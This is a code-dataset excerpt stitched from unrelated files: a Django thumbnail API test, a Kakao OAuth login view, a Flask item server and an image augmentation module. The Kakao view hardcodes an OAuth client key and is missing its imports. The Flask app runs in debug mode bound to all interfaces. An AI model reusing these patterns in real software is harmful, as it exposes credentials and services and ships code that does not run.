@pytest.mark.parametrize(\"max_dimension\", [\"default\", \"random\"])\n def test_correct_image(self, client, max_dimension, is_3d, image_factory):\n image = image_factory()\n if max_dimension == \"random\":\n max_dimension = random.randint(1, 255)\n else:\n max_dimension = settings.RETINA_DEFAULT_THUMBNAIL_SIZE\n self.do_test_thumbnail_creation(\n client, max_dimension, image, is_3d=is_3d\n )\n\n def test_16bit_image(self, client):\n image = ImageFactoryWithImageFile16Bit()\n self.do_test_thumbnail_creation(\n client,\n max_dimension=settings.RETINA_DEFAULT_THUMBNAIL_SIZE,\n image=image,\n is_3d=True,\n )\n", "sub_path": "app/tests/retina_api_tests/test_views.py", "file_name": "test_views.py", "file_ext": "py", "file_size_in_byte": 4471, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "tests.cases_tests.factories.ImageFactoryWithImageFile", "line_number": 38, "usage_type": "call"}, {"api_name": "grandchallenge.subdomains.utils.reverse", "line_number": 40, "usage_type": "call"}, {"api_name": "tests.retina_api_tests.helpers.get_user_from_str", "line_number": 41, "usage_type": "call"}, {"api_name": "knox.models.AuthToken.objects.create", "line_number": 44, "usage_type": "call"}, {"api_name": "knox.models.AuthToken.objects", "line_number": 44, "usage_type": "attribute"}, {"api_name": "knox.models.AuthToken", "line_number": 44, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 28, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 28, "usage_type": "attribute"}, {"api_name": "rest_framework.status.HTTP_401_UNAUTHORIZED", "line_number": 31, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 31, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_403_FORBIDDEN", "line_number": 32, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 32, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_403_FORBIDDEN", "line_number": 33, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 33, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 34, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 34, "usage_type": "name"},
{"api_name": "django.conf.settings.RETINA_DEFAULT_THUMBNAIL_SIZE", "line_number": 53, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 53, "usage_type": "name"}, {"api_name": "grandchallenge.subdomains.utils.reverse", "line_number": 55, "usage_type": "call"}, {"api_name": "tests.retina_api_tests.helpers.client_force_login", "line_number": 56, "usage_type": "call"}, {"api_name": "knox.models.AuthToken.objects.create", "line_number": 57, "usage_type": "call"}, {"api_name": "knox.models.AuthToken.objects", "line_number": 57, "usage_type": "attribute"}, {"api_name": "knox.models.AuthToken", "line_number": 57, "usage_type": "name"}, {"api_name": "SimpleITK.GetArrayFromImage", "line_number": 65, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 72, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 72, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 73, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 73, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 74, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 76, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 84, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 84, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 87, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 87, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 88, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 88, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 106, "usage_type": "call"}, {"api_name": "django.conf.settings.RETINA_DEFAULT_THUMBNAIL_SIZE", "line_number": 108, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 108, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 94, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 94, "usage_type": "attribute"}, {"api_name": "tests.cases_tests.factories.ImageFactoryWithImageFile2DLarge", "line_number": 97, "usage_type": "name"}, {"api_name": "tests.cases_tests.factories.ImageFactoryWithImageFile3DLarge3Slices", "line_number": 98, "usage_type": "name"}, {"api_name": "tests.cases_tests.factories.ImageFactoryWithImageFile3DLarge4Slices", "line_number": 99, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 102, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 102, "usage_type": "attribute"}, {"api_name": "tests.cases_tests.factories.ImageFactoryWithImageFile16Bit", "line_number": 114, "usage_type": "call"}, {"api_name": "django.conf.settings.RETINA_DEFAULT_THUMBNAIL_SIZE", "line_number": 117, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 117, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 26, "usage_type": "attribute"}]} +{"seq_id": "301677180", "text": "from django.shortcuts import render, get_object_or_404, redirect\nimport urllib\nfrom django.views import View\nimport allauth\n\n# Create your views here.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nclass KakaoLoginVIew(View):\n def get(self, request):\n kakao_access_code = request.GET.get('code', None)\n\n url = 'https://kauth.kakao.com/oauth/token'\n\n headers = {'Content_type': 'application/x-www-form-urlencoded; charset=utf-8'}\n\n body = {'grant_type' : 'authorization_code',\n 'client_id' : 
'beb7c6a8d954a47c48242ba1c1dac2d4',\n 'redirect_uri' : 'http://127.0.0.1:8000/account/login/kakao/callback',\n 'code': kakao_access_code\n }\n token_kakao_response = requests.post(url, headers = headers, data = body)\n\n access_token = json.loads(token_kakao_response.text).get('access_token')\n\n url = 'https://kapi.kakao.com/v2/user/me'\n headers = {\n 'Authorization' : f'Bearer {access_token}',\n 'Content-type': 'application/x-www-form-urlencoded; charset=utf-8'\n }\n\n kakao_response = requests.get(url, headers = headers)\n kakao_profile = json.loads(kakao_response.text)\n # NOTE: the original code looked up Socialplatform.objects.get(platform.text) here,\n # but neither Socialplatform nor platform is defined or imported in this file,\n # so that lookup is left out until such a model exists.\n return HttpResponse(f'{kakao_profile}')\n\n\n\n\n\n\n\n# def oauth(request):\n# code = request.GET['code']\n# print('code= ' + str(code))\n\n# client_id = 'beb7c6a8d954a47c48242ba1c1dac2d4'\n# redirect_uri = 'http://127.0.0.1:8000/account/login/kakao/callback'\n# access_token_request_uri = \"https://kauth.kakao.com/oauth/token?grant_type=authorization_code&\"\n\n# access_token_request_uri += \"client_id=\" + client_id\n# access_token_request_uri += \"&redirect_uri=\" + redirect_uri\n# access_token_request_uri += \"&code=\" + code\n# print(access_token_request_uri)\n\n# access_token_request_uri_data = requests.get(access_token_request_uri)\n# json_data = access_token_request_uri_data.json()\n# access_token = json_data['access_token']\n# print(access_token)\n\n# user_profile_info_uri = \"https://kapi.kakao.com/v2/user/me?access_token=\"\n# user_profile_info_uri += str(access_token)\n# print(user_profile_info_uri)\n\n# user_profile_info_uri_data = requests.get(user_profile_info_uri)\n# user_json_data = user_profile_info_uri_data.json()\n# user_nickname = user_json_data['properties']['nickname']\n# print(user_nickname)\n\n# return redirect('index')\n\n# def kakao_login(request):\n# login_request_uri = 'https://kauth.kakao.com/oauth/authorize?'\n# client_id = 'beb7c6a8d954a47c48242ba1c1dac2d4'\n# redirect_uri = 'http://127.0.0.1:8000/account/login/kakao/callback'\n\n# login_request_uri += 'client_id=' + client_id\n# login_request_uri += '&redirect_uri=' + redirect_uri\n# login_request_uri += '&response_type=code'\n\n# return redirect(login_request_uri)\n\n# # request the authorization code\n# def kakao_login(request):\n# app_rest_api_key = 'beb7c6a8d954a47c48242ba1c1dac2d4'\n# redirect_uri = \"http://127.0.0.1:8000/account/login/kakao/callback\"\n# return redirect(f\"https://kauth.kakao.com/oauth/authorize?client_id={app_rest_api_key}&redirect_uri={redirect_uri}&response_type=code\")\n\n# # request the access token\n# def kakao_callback(request):\n# params = urllib.parse.urlencode(request.GET)\n# return redirect(f'http://127.0.0.1:8000/account/login/kakao/callback?{params}')", "sub_path": "ddabong/account/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3416, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.views.View", "line_number": 29, "usage_type": "name"}]}
DELETE and PUT, but POST does those too)\n######### defaults to GET... but better to always specify\n######### if you try to POST but don't say to, will get 405 error\n@app.route(\"/api/add-entry\", methods=['POST'])\n### ^^^ defines route name\n@cross_origin()\n#### ^^^ need this because 2 servers: front end and back end\ndef add_entry():\n data = request.get_json()\n ## ^^^ creates dictionary for incoming strings or whatnot\n item_name=data.get(\"itemName\")\n ## creates entery in dictionary {item_name, \"actual name\"}\n print(data)\n item_description=data.get(\"itemDescription\")\n new_entry=AllItems(item_name=item_name, item_description=item_description)\n db.session.add(new_entry)\n db.session.commit()\n print(\"everything but return...\")\n return \"Done added it yeah\"\n\n\n@app.route(\"/api/entries\", methods=['GET'])\n### ^^^ defines route name\n@cross_origin()\n#### ^^^ need this because 2 servers: front end and back end\ndef view_entries():\n q = request.args.get('q')\n print(q)\n entries = []\n if q:\n query_item = AllItems.query.filter(AllItems.item_name.like(f'%{q}%'))\n entries = query_item.all()\n else:\n entries = AllItems.query.all()\n #### ^^^ from class name in model.py, returns list of db objects\n list_of_json_objects_from_db = []\n for e in entries:\n dic_of_items = {\n \"formEntryID\": e.form_entry_id,\n \"date\": e.date,\n \"itemName\": e.item_name,\n \"itemDescription\": e.item_description\n } ### ^^^ these name strings are same as in db, but these are new!!!\n list_of_json_objects_from_db.append(dic_of_items)\n #### cycles through table, creating a dic for each row: \"columnName\", value\n ### .... and makes it not-quite-json....:\n return jsonify(list_of_json_objects_from_db)\n\n\nif __name__ == \"__main__\":\n app.debug = True\n app.jinja_env.auto_reload = app.debug\n connect_to_db(app)\n app.run(port=5000, host='0.0.0.0')\n", "sub_path": "server/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 2462, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 6, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 7, "usage_type": "call"}, {"api_name": "flask_restful.Api", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 22, "usage_type": "name"}, {"api_name": "model.AllItems", "line_number": 28, "usage_type": "call"}, {"api_name": "model.db.session.add", "line_number": 29, "usage_type": "call"}, {"api_name": "model.db.session", "line_number": 29, "usage_type": "attribute"}, {"api_name": "model.db", "line_number": 29, "usage_type": "name"}, {"api_name": "model.db.session.commit", "line_number": 30, "usage_type": "call"}, {"api_name": "model.db.session", "line_number": 30, "usage_type": "attribute"}, {"api_name": "model.db", "line_number": 30, "usage_type": "name"}, {"api_name": "flask_cors.cross_origin", "line_number": 19, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 40, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 40, "usage_type": "name"}, {"api_name": "model.AllItems.query.filter", "line_number": 44, "usage_type": "call"}, {"api_name": "model.AllItems.query", "line_number": 44, "usage_type": "attribute"}, {"api_name": "model.AllItems", "line_number": 44, "usage_type": 
"name"}, {"api_name": "model.AllItems.item_name.like", "line_number": 44, "usage_type": "call"}, {"api_name": "model.AllItems.item_name", "line_number": 44, "usage_type": "attribute"}, {"api_name": "model.AllItems.query.all", "line_number": 47, "usage_type": "call"}, {"api_name": "model.AllItems.query", "line_number": 47, "usage_type": "attribute"}, {"api_name": "model.AllItems", "line_number": 47, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 60, "usage_type": "call"}, {"api_name": "flask_cors.cross_origin", "line_number": 37, "usage_type": "call"}, {"api_name": "model.connect_to_db", "line_number": 66, "usage_type": "call"}]} +{"seq_id": "260964203", "text": "import cv2\nimport numpy as np\nimport random\nimport copy\nimport math\nfrom scipy.stats import mode\nfrom math import fabs, sin, cos, radians\n\n#common 光学变换\nclass RandomSwapChannels(object):\n def __init__(self):\n self.swaps = ((0, 1, 2), (0, 2, 1),\n (1, 0, 2), (1, 2, 0),\n (2, 0, 1), (2, 1, 0))\n\n def __call__(self, image, labels=None):\n if random.randint(0, 1):\n index = random.randint(0, len(self.swaps) - 1)\n image = image[:, :, self.swaps[index]]\n return image, labels\n\nclass RandomContrast(object):\n def __init__(self, lower=0.5, upper=1.5):\n self.lower = lower\n self.upper = upper\n assert self.upper >= self.lower, \"contrast upper must be >= lower.\"\n assert self.lower >= 0, \"contrast lower must be non-negative.\"\n\n # expects float image\n def __call__(self, image, labels=None):\n if random.randint(0, 1):\n alpha = random.uniform(self.lower, self.upper)\n image = image.astype(np.float32) * alpha\n return image, labels\n\nclass RandomHSV(object):\n def __init__(self, hue=0.1, saturation=1.5, value=1.5):\n self.hue = hue\n self.saturation = saturation\n self.value = value\n\n def __call__(self, image, labels=None):\n if random.randint(0, 1):\n dh = random.uniform(-self.hue, self.hue)\n ds = random.uniform(1, self.saturation)\n if random.random() < 0.5:\n ds = 1 / ds\n dv = random.uniform(1, self.value)\n if random.random() < 0.5:\n dv = 1 / dv\n\n image = image.astype(np.float32) / 255.0\n image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n\n def wrap_hue(x):\n x[x >= 360.0] -= 360.0\n x[x < 0.0] += 360.0\n return x\n\n image[:, :, 0] = wrap_hue(image[:, :, 0] + (360.0 * dh))\n image[:, :, 1] = np.clip(ds * image[:, :, 1], 0.0, 1.0)\n image[:, :, 2] = np.clip(dv * image[:, :, 2], 0.0, 1.0)\n\n image = cv2.cvtColor(image, cv2.COLOR_HSV2BGR)\n image = (image * 255.0)\n return image, labels\n\n'''\nclass RandomBrightness(object):\n def __init__(self, delta=32):\n assert delta >= 0.0\n assert delta <= 255.0\n self.delta = delta\n\n def __call__(self, image, labels=None):\n if random.randint(0, 1):\n delta = random.uniform(-self.delta, self.delta)\n image += delta\n return image, labels\n'''\n\nclass RandomBrightness(object):\n def __init__(self, delta=220):\n assert delta >= 0.0\n assert delta <= 255.0\n self.delta = delta\n\n def __call__(self, image, labels=None):\n if random.randint(0, 1):\n old_tyupe = image.dtype\n image = image.astype(np.float32)\n delta = random.uniform(0, self.delta)\n image += delta\n image[image > 255] = 255\n image = image.astype(old_tyupe)\n return image, labels\n\nclass RandomSaltNoise(object):\n\n def __init__(self, max_noise_rate=0.1):\n self.max_noise_rate = max_noise_rate\n\n def __call__(self, img, labels=None):\n\n if random.randint(0, 1):\n noise_count = int(img.size * self.max_noise_rate)\n for k in range(noise_count):\n i = int(np.random.random() * 
img.shape[1])\n j = int(np.random.random() * img.shape[0])\n value = np.random.random() * 100\n if img.ndim == 2:\n img[j, i] = value\n elif img.ndim == 3:\n img[j, i, 0] = value\n img[j, i, 1] = value\n img[j, i, 2] = value\n\n return img, labels\n\nclass RgbToGray(object):\n def __init__(self):\n pass\n\n def __call__(self, img, labels=None):\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY).astype(np.float32)\n img = img.reshape(img.shape[0], img.shape[1], 1)\n return img, labels\n\nclass NormalizeImage(object):\n def __init__(self, mean, std):\n self.mean = np.array(mean).astype(np.float32)\n self.std = np.array(std).astype(np.float32)\n pass\n\n def __call__(self, image, labels=None):\n image = image - self.mean\n image = image / self.std\n return image, labels\n\n\n# common: geometric transforms\nclass ResizeImage(object):\n def __init__(self, size):\n self.size = size\n\n def __call__(self, image, labels=None, resize=None):\n h, w = image.shape[:2]\n if resize is None:\n scale_h = self.size[1] / h\n scale_w = self.size[0] / w\n image = cv2.resize(image, tuple(self.size))\n else:\n scale_h = resize[1] / h\n scale_w = resize[0] / w\n image = cv2.resize(image, tuple(resize))\n\n if labels is not None and len(labels) > 0:\n labels[:, 0] = labels[:, 0] * scale_w\n labels[:, 1] = labels[:, 1] * scale_h\n labels[:, 2] = labels[:, 2] * scale_w\n labels[:, 3] = labels[:, 3] * scale_h\n\n return image, labels\n\n\nclass RandomResizePadding(object):\n \"\"\"Random stretch-and-pad.\n First change the aspect ratio of the image content, then pad so the overall aspect ratio is preserved:\n the aspect ratio of the image subject changes while the image's own aspect ratio does not.\n Input: OpenCV image and non-normalized xyxy coordinates.\n \"\"\"\n\n def __init__(self, stretch_list=[1.1, 1.2, 1.3, 1.4, 1.5], padding_value=[255, 255, 255]):\n self.stretch_list = stretch_list\n self.padding = padding_value\n\n def __call__(self, img, labels):\n if random.randint(0, 1):\n ratio = self.stretch_list[random.randint(0, len(self.stretch_list) - 1)]\n height = img.shape[0]\n width = img.shape[1]\n\n # height < width\n if random.randint(0, 1):\n img = cv2.resize(img, (int(width * ratio), height))\n det = int(((height * ratio) - height) / 2)\n img = cv2.copyMakeBorder(img, det, det, 0, 0, cv2.BORDER_CONSTANT, value=self.padding)\n if labels is not None and len(labels) > 0:\n labels[:, 1:4:2] += det\n labels[:, 0:3:2] = labels[:, 0:3:2].astype(np.float32) * ratio\n\n # height > width\n else:\n img = cv2.resize(img, (width, int(height * ratio)))\n det = int(((width * ratio) - width) / 2)\n img = cv2.copyMakeBorder(img, 0, 0, det, det, cv2.BORDER_CONSTANT, value=self.padding)\n if labels is not None and len(labels) > 0:\n labels[:, 0:3:2] += det\n labels[:, 1:4:2] = labels[:, 1:4:2].astype(np.float32) * ratio\n\n return img, labels\n\nclass RandomCropFix(object):\n def __init__(self, size):\n self.size = size\n\n def __call__(self, image, labels=None):\n h, w = image.shape[:2]\n crop_w, crop_h = self.size\n if crop_w > w or crop_h > h:\n raise ValueError('RandomCrop failed')\n h_offset = random.randint(0, h - crop_h)\n w_offset = random.randint(0, w - crop_w)\n image = image[h_offset:h_offset + crop_h, w_offset:w_offset + crop_w]\n\n if labels is not None and len(labels) > 0:\n labels[:, 0:3:2] -= w_offset\n labels[:, 1:4:2] -= h_offset\n labels[:, 0:3:2] = np.clip(labels[:, 0:3:2], 0, crop_w)\n labels[:, 1:4:2] = np.clip(labels[:, 1:4:2], 0, crop_h)\n\n return image, labels\n\nclass RandomCropRatio(object):\n def __init__(self, ratio):\n assert (ratio > 0 and ratio <= 1)\n self.ratio = ratio\n\n def __call__(self, image, labels=None):\n h, w = image.shape[:2]\n crop_w, crop_h = (int(float(w) * self.ratio), int(float(h) * 
self.ratio))\n if crop_w > w or crop_h > h:\n raise ValueError('RandomCrop failed')\n h_offset = random.randint(0, h - crop_h)\n w_offset = random.randint(0, w - crop_w)\n image = image[h_offset:h_offset + crop_h, w_offset:w_offset + crop_w]\n\n if labels is not None and len(labels) > 0:\n labels[:, 0:3:2] -= w_offset\n labels[:, 1:4:2] -= h_offset\n labels[:, 0:3:2] = np.clip(labels[:, 0:3:2], 0, crop_w)\n labels[:, 1:4:2] = np.clip(labels[:, 1:4:2], 0, crop_h)\n\n return image, labels\n\nclass CenterCropFix(object):\n def __init__(self, size):\n self.size = size\n\n def __call__(self, image, labels=None):\n h, w = image.shape[:2]\n crop_w, crop_h = self.size\n if crop_w > w or crop_h > h:\n raise ValueError('RandomCrop failed')\n h_offset = int((h - crop_h) / 2)\n w_offset = int((w - crop_w) / 2)\n image = image[h_offset:h_offset + crop_h, w_offset:w_offset + crop_w]\n\n if labels is not None and len(labels) > 0:\n labels[:, 0:3:2] -= w_offset\n labels[:, 1:4:2] -= h_offset\n labels[:, 0:3:2] = np.clip(labels[:, 0:3:2], 0, crop_w)\n labels[:, 1:4:2] = np.clip(labels[:, 1:4:2], 0, crop_h)\n\n return image, labels\n\nclass RandomHorizontalFlip(object):\n def __init__(self):\n pass\n\n def __call__(self, image, labels=None):\n if random.randint(0, 1):\n image = cv2.flip(image, 1)\n if labels is not None and len(labels) > 0:\n labels_old = copy.deepcopy(labels)\n h, w = image.shape[:2]\n labels[:, 0] = w - labels_old[:, 2]\n labels[:, 2] = w - labels_old[:, 0]\n pass\n return image, labels\n\nclass RandomExpand(object):\n def __init__(self, mean):\n self.mean = mean\n\n def __call__(self, image, labels):\n if random.randint(0, 1):\n height, width, depth = image.shape\n ratio = random.uniform(1, 3)\n left = random.uniform(0, width * ratio - width)\n top = random.uniform(0, height * ratio - height)\n\n expand_image = np.zeros(\n (int(height * ratio), int(width * ratio), depth),\n dtype=image.dtype)\n expand_image[:, :, :] = self.mean\n expand_image[int(top):int(top + height),\n int(left):int(left + width)] = image\n image = expand_image\n\n if labels is not None and len(labels) > 0:\n labels[:, 0] += int(left)\n labels[:, 1] += int(top)\n labels[:, 2] += int(left)\n labels[:, 3] += int(top)\n return image, labels\n\n# just for cls\n\nclass ClsRandomPaddingWidth(object):\n def __init__(self, min_ratio=-0.3, max_ratio=0.3):\n self.min_ratio = min_ratio\n self.max_ratio = max_ratio\n\n def __call__(self, image, labels):\n height, width, depth = image.shape\n ratio = random.uniform(self.min_ratio, self.max_ratio)\n\n if ratio < 0:\n w_start = int(width * (-ratio) / 2)\n w_stop = int(width - width * (-ratio) / 2)\n return image[:, w_start:w_stop, :], labels\n else:\n det = int(width * (ratio) / 2)\n img = cv2.copyMakeBorder(image, 0, 0, det, det, cv2.BORDER_CONSTANT, value=(255, 255, 255))\n return img, labels\n\nclass ClsRandomRotate(object):\n \"\"\"Random rotation (for image classification only).\n Input: OpenCV image.\n \"\"\"\n\n def __init__(self, max_degree=45, filled_color=-1):\n self.max_degree = max_degree\n self.filled_color = filled_color\n\n def __call__(self, img, labels=None):\n\n if random.randint(0, 1):\n self.degree = random.randint(-self.max_degree, self.max_degree)\n # get the fill color for the four corners after rotation\n if self.filled_color == -1:\n self.filled_color = mode([img[0, 0], img[0, -1],\n img[-1, 0], img[-1, -1]]).mode[0]\n if np.array(self.filled_color).shape[0] == 2:\n if isinstance(self.filled_color, int):\n self.filled_color = (self.filled_color, self.filled_color, self.filled_color)\n else:\n self.filled_color = tuple([int(i) for i in 
self.filled_color])\n\n height, width = img.shape[:2]\n\n # size after rotation\n height_new = int(width * fabs(sin(radians(self.degree))) +\n height * fabs(cos(radians(self.degree))))\n width_new = int(height * fabs(sin(radians(self.degree))) +\n width * fabs(cos(radians(self.degree))))\n\n mat_rotation = cv2.getRotationMatrix2D((width / 2, height / 2), self.degree, 1)\n\n mat_rotation[0, 2] += (width_new - width) / 2\n mat_rotation[1, 2] += (height_new - height) / 2\n\n # Pay attention to the type of elements of filler_color, which should be\n # the int in pure python, instead of those in numpy.\n img = cv2.warpAffine(img, mat_rotation, (width_new, height_new),\n borderValue=self.filled_color)\n # fill the four corners\n mask = np.zeros((height_new + 2, width_new + 2), np.uint8)\n mask[:] = 0\n seed_points = [(0, 0), (0, height_new - 1), (width_new - 1, 0),\n (width_new - 1, height_new - 1)]\n for i in seed_points:\n cv2.floodFill(img, mask, i, self.filled_color)\n\n return img, labels\n\nclass ClsRandomRotate180(object):\n def __init__(self):\n pass\n def __call__(self, img, labels=None):\n img = cv2.flip(img, 0)\n img = cv2.flip(img, 1)\n return img, labels\n\nclass ClsAffine(object):\n def __init__(self):\n pass\n def __call__(self, image, labels):\n if random.randint(0, 1):\n height, width, depth = image.shape\n ratio_h = random.uniform(-0.08, +0.08)\n ratio_w = random.uniform(-0.08, +0.08)\n matSrc = np.float32([[0,0],[0,height-1],[width-1,0]])\n matDst = np.float32([[ratio_h*height, ratio_w*width],[0,height+1],[width+1,0]])\n matAffine = cv2.getAffineTransform(matSrc,matDst)\n dst = cv2.warpAffine(image,matAffine,(width,height), borderValue=(255,255,255))\n return dst, labels\n else:\n return image, labels\n\n\n\n# just for det\nclass DetIgnoreBoxes(object):\n def __init__(self, min_area=0, ignore_class=[]):\n self.min_area = min_area\n self.ignore_class = ignore_class\n def __call__(self, image, labels):\n ignore_indexs = []\n if self.min_area > 0:\n assert(labels is not None)\n for i,label in enumerate(labels):\n if int(label[4]) in self.ignore_class or \\\n (label[2]-label[0])*(label[3]-label[1]) < self.min_area:\n ignore_indexs.append(i)\n if len(ignore_indexs) > 0:\n #print('*** ignore %d boxes'%(len(ignore_indexs)))\n labels = np.delete(labels, ignore_indexs, axis = 0)\n\n return image, labels", "sub_path": "Trainer/DLEngine/modules/dataloader/transform.py", "file_name": "transform.py", "file_ext": "py", "file_size_in_byte": 15045, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "random.randint", "line_number": 17, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 18, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 31, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 33, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 43, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 44, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 45, "usage_type": "call"}, {"api_name": "random.random", "line_number": 46, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 48, "usage_type": "call"}, {"api_name": "random.random", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 52, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 53, "usage_type": "call"}, {"api_name": 
"cv2.COLOR_BGR2HSV", "line_number": 53, "usage_type": "attribute"}, {"api_name": "numpy.clip", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 62, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 64, "usage_type": "call"}, {"api_name": "cv2.COLOR_HSV2BGR", "line_number": 64, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 91, "usage_type": "attribute"}, {"api_name": "random.uniform", "line_number": 92, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 108, "usage_type": "attribute"}, {"api_name": "numpy.random.random", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 109, "usage_type": "attribute"}, {"api_name": "numpy.random.random", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 110, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 125, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 125, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 125, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 131, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 132, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 151, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 155, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 178, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 179, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 184, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 185, "usage_type": "call"}, {"api_name": "cv2.copyMakeBorder", "line_number": 187, "usage_type": "call"}, {"api_name": "cv2.BORDER_CONSTANT", "line_number": 187, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 190, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 194, "usage_type": "call"}, {"api_name": "cv2.copyMakeBorder", "line_number": 196, "usage_type": "call"}, {"api_name": "cv2.BORDER_CONSTANT", "line_number": 196, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 199, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 212, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 213, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 219, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 220, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 234, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 235, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 241, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 242, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 263, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 272, "usage_type": "call"}, {"api_name": "cv2.flip", "line_number": 273, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 275, 
"usage_type": "call"}, {"api_name": "random.randint", "line_number": 287, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 289, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 290, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 291, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 293, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 317, "usage_type": "call"}, {"api_name": "cv2.copyMakeBorder", "line_number": 325, "usage_type": "call"}, {"api_name": "cv2.BORDER_CONSTANT", "line_number": 325, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 339, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 340, "usage_type": "call"}, {"api_name": "scipy.stats.mode", "line_number": 343, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 345, "usage_type": "call"}, {"api_name": "math.fabs", "line_number": 354, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 354, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 354, "usage_type": "call"}, {"api_name": "math.fabs", "line_number": 355, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 355, "usage_type": 